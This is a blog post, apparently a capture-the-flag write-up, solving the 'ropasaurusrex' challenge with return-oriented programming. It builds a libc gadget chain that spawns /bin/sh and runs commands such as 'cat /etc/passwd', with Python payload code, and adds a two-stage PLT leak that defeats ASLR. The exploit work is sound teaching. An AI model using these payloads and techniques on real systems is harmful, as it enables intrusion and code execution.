Thursday, 5 June 2014

ROP ROP ROP

Return Oriented Programming (ROP) is all the rage! Well almost, but it is needed when you can control the stack but not be able to execute from it i.e. with ASLR and NX. In this post I present my solution to ropasaurusrex which leveraged ROP. First the overflow:


It really doesn't get easier than this. There is a buffer on the stack which is much less than 256 bytes size and there is a read into that buffer of 256 bytes. We overwrite the return address and set the EIP free. That leave instruction in the epilog means that we can't just find a 'jmp esp' somewhere and easily use it. Also, I wanted to practice my ROP skills so I didn't consider any other exploitation vectors. So, we are going to build a ROP stack.

Aside from our binary there are two loaded modules:
(gdb) info sharedlibrary  
From        To          Syms Read   Shared Object Library 
0xf7e2f420  0xf7f5e6ee  Yes (*)     /lib32/libc.so.6 
0xf7fdc860  0xf7ff47ac  Yes (*)     /lib/ld-linux.so.2
I will be using libc for finding my gadgets. What are gadgets? Using ROP is like lining up dominoes and then letting them fall in some path. The only difference is that in ROP we might actually be able to make decisions because we can point to conditional instructions. In this case gadgets are the domino pieces that we line up by placing their addresses on the stack. The addresses are 'return' addresses pointing to the next gadget as if the next gadget has actually called the previous. Probably a convoluted explanation but it will make sense soon.

Imagine you have the following C code:
int a = 0; 
void A() { a++; return; } 
void B() { A(); a += 2; return; } 
void C() { B(); a += 3; return; }
That, in essence represents what a ROP chain is --- a list of gadgets. Starting with function C, by the time function A is invoked the stack will contain return addresses back to functions C and B in order. The actual useful 'work' parts are the increments of the variable 'a'. For this to be a proper ROP chain we will logically take out all the call instructions to any of the function and just pretend that they happened. Then we will point EIP to the 'a++' statement and let the code run. We want to do that because we want function A to do it's operation first. When A returns, it will return 'back' to B executing 'a += 2' and so on.

With this logic we can set up a theoretically arbitrary control flow. ROP has been shown to be turing complete [1] although in practice that might be tougher to achieve. There is also a similar method called Jump Oriented Programming [2] (JOP) which uses a dispatch address table and jump instructions to control flow of execution. It is similar to how C-style switch statements operate.

Back to our code. The EIP is trivially controlled, so let's talk about what we will do with it. To practice ROP I have disabled ASLR on my Virtual Machine by writing 0 to /proc/sys/kernel/randomize_va_space. Will be looking at leaking next time. This allows me to make assumptions about where my libc module is loaded at the time of exploitation.

The target application reads/writes on the standard IO. This means that I will be feeding the exploit through a pipe on the command line. So to get the ropasaurus to execute my commands I will have it execv a shell and then have access to any sort of shell commands. For this we will need the execv shellcode... but in ROP form.

We will use the execv system call via interrupt 0x80. So, somehow, we need to set up the registers as follows. Remember linux system calls expect parameters to be passed via registers.

    EAX = 0xB              // System call number
    EBX = PTR to "/bin/sh" // File to execute
    ECX = NULL             // Program arguments
    EDX = NULL             // Program environment

Once the registers are set up we call interrupt 0x80 and the kernel takes care of the rest. I like this method because there is no need to do any clean up. The only thing we should be aware of is that the shell will start reading STDIN looking for commands. This happens after ropasaurus has read 256 bytes. So our exploit buffer needs to contain the shell commands after 256 bytes (i.e. cat /etc/passwd).

At the minimum we want to replicate the functionality of this code:

(Courtesy of the Online Disassember)

We do this by finding gadgets in the libc image. Using an online tool, ropshell, I was able to generate searchable list of all possible gadgets. Basically those are all sets of possible instructions that end with a return or a jump instruction.

So we put together a "shellcode" sequence that looks like this. Think of it as the sequence pointers to instructions to be executed not the actual instruction byte codes sent to the program. At the beginning I notice that ECX has the pointer to our buffer. So I need to pivot the stack and have ESP point to it. We point the EIP to the first instruction:

    pop edx      'preparing for the next jmp.
    ret
    mov esp, ecx 'stack pivot
    jmp edx      
    pop ecx      'now at the beginning
    pop eax      '[pop #1]
    ret

This sequence allows us to "wrap" around ESP to the beginning of our buffer which gives us more space to play. Considering how the overflow worked this might not have been entirely necessary as there would probably be enough space to write the rest of the ROP chain. But it's done now.

In each case ret and jmp instructions are set up such that they point to the the next instruction to execute. In reality the EIP is jumping all around the libc text section. Next, we set up the registers to prepare for the system call.

    push esp
    pop ebx       'point near /bin/sh
    pop esi
    ret
    add ebx, eax  '[pop #1] adjusts ebx
    add eax, 2
    ret
    pop edx       'program environment
    ret
    add al, -0x17 'set EAX to 0xB
    ret
    int 0x80

Done. Once this sequence executes we will have the shell. Notice that it is very not straight forward as compared to the nice, no hacking, solution. Here we use EAX to adjust the EBX pointer before it is fixed up to be the system call number. The stack buffer is built up using the this python code:

buf += uint(0)            # the ecx for g2
buf += uint( (0xB + 0x17 - 2) ) # the eax for g2
buf += gadget(0x0010D251) # ret of g2 going to g3:
buf += 'AAAA'             # value for esi of g3
buf += gadget(0x00143242) # g4: add ebx, eax; add eax, 2; ret
buf += gadget(0x0002E3CC) # g7: pop edx; ret
buf += uint(0)            # value of edx for g7
buf += gadget(0x0010A44D) # g6: add al, -0x17, ret
buf += gadget(0x000EA621) # g5: int 0x80
buf += '/bin'
buf += '/sh\x00'
buf += "/bin/bash\x00"

buf = padwith(buf, 0x100-4*29)

# return address (initial EIP)
buf += gadget(0x0002E3CC) # g0: pop edx; ret

buf += gadget(0x000EE100) # value of edx for gadget 0
buf += gadget(0x0002E49D) # g1: mov esp, ecx; jmp edx

buf = padwith(buf, 0x100) # make exactly 256 bytes

The addresses are the values given by the ROPShell tool but the python code outputs the corrected offsets using the base address of libc. Once executed we can feed any sort of shells commands that we want:


ROP.

Update: I couldn't just let this one go without a full exploit. I've spent a little bit more time and developed a mechanism to leak out an address of a function within libc which gave me a chance to calculate the base address of the libc module.

The exploit will working like this. First we send in 256 bytes to leak out an address, then we send 256 bytes to execute a shell. It's a two stage exploit which also means that the it becomes interactive.

First, we notice that the binary was compiled without RELRO which means that the GOT PLT will be at a known address. The PLT contains dynamically generated addresses to library functions. There is a good write up of how it works on the ISISBlogs. So, we need to figure out a way to get those addresses.

The way I've done it is to point the initial return address to the write function in the PLT entry and on the stack I've put in the parameters for the write call. Essentially I simulate the call to write once the function containing a read returns. This write will send back 0x1C bytes of the PLT - the entire table. On the same stack I put in the address of the main function, so that I could start the process again allowing me another shot at the bug knowing the location of the write function. At this point, see the beginning of the blog.

The code for the leak looks like this:

   buf = padwith(buf, 0x100-4*29)

   # return address (initial EIP)
   buf += addr(0x08048312) # point to write@plt
   buf += addr(0x0804841D) # return main 
   buf += uint(1)          # STDOUT
   buf += uint(0x08049614) # point to the plt for write
   buf += uint(0x1c)       # write buffer size

   buf = padwith(buf, 0x100) 

Works every time.

---------------------

[1] E. Buchanan, R. Roemer, H. Shacham, and S. Savage. When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC. In 15th ACM CCS, pages 27–38, New
York, NY, USA, 2008. ACM.

[2] T. Bletsch, X. Jiang, V. Freeh and Z. Liang. Jump-Oriented Programming: A New Class of Code-Reuse Attack. ASIACCS ’11, March 22–24, 2011, Hong Kong, China.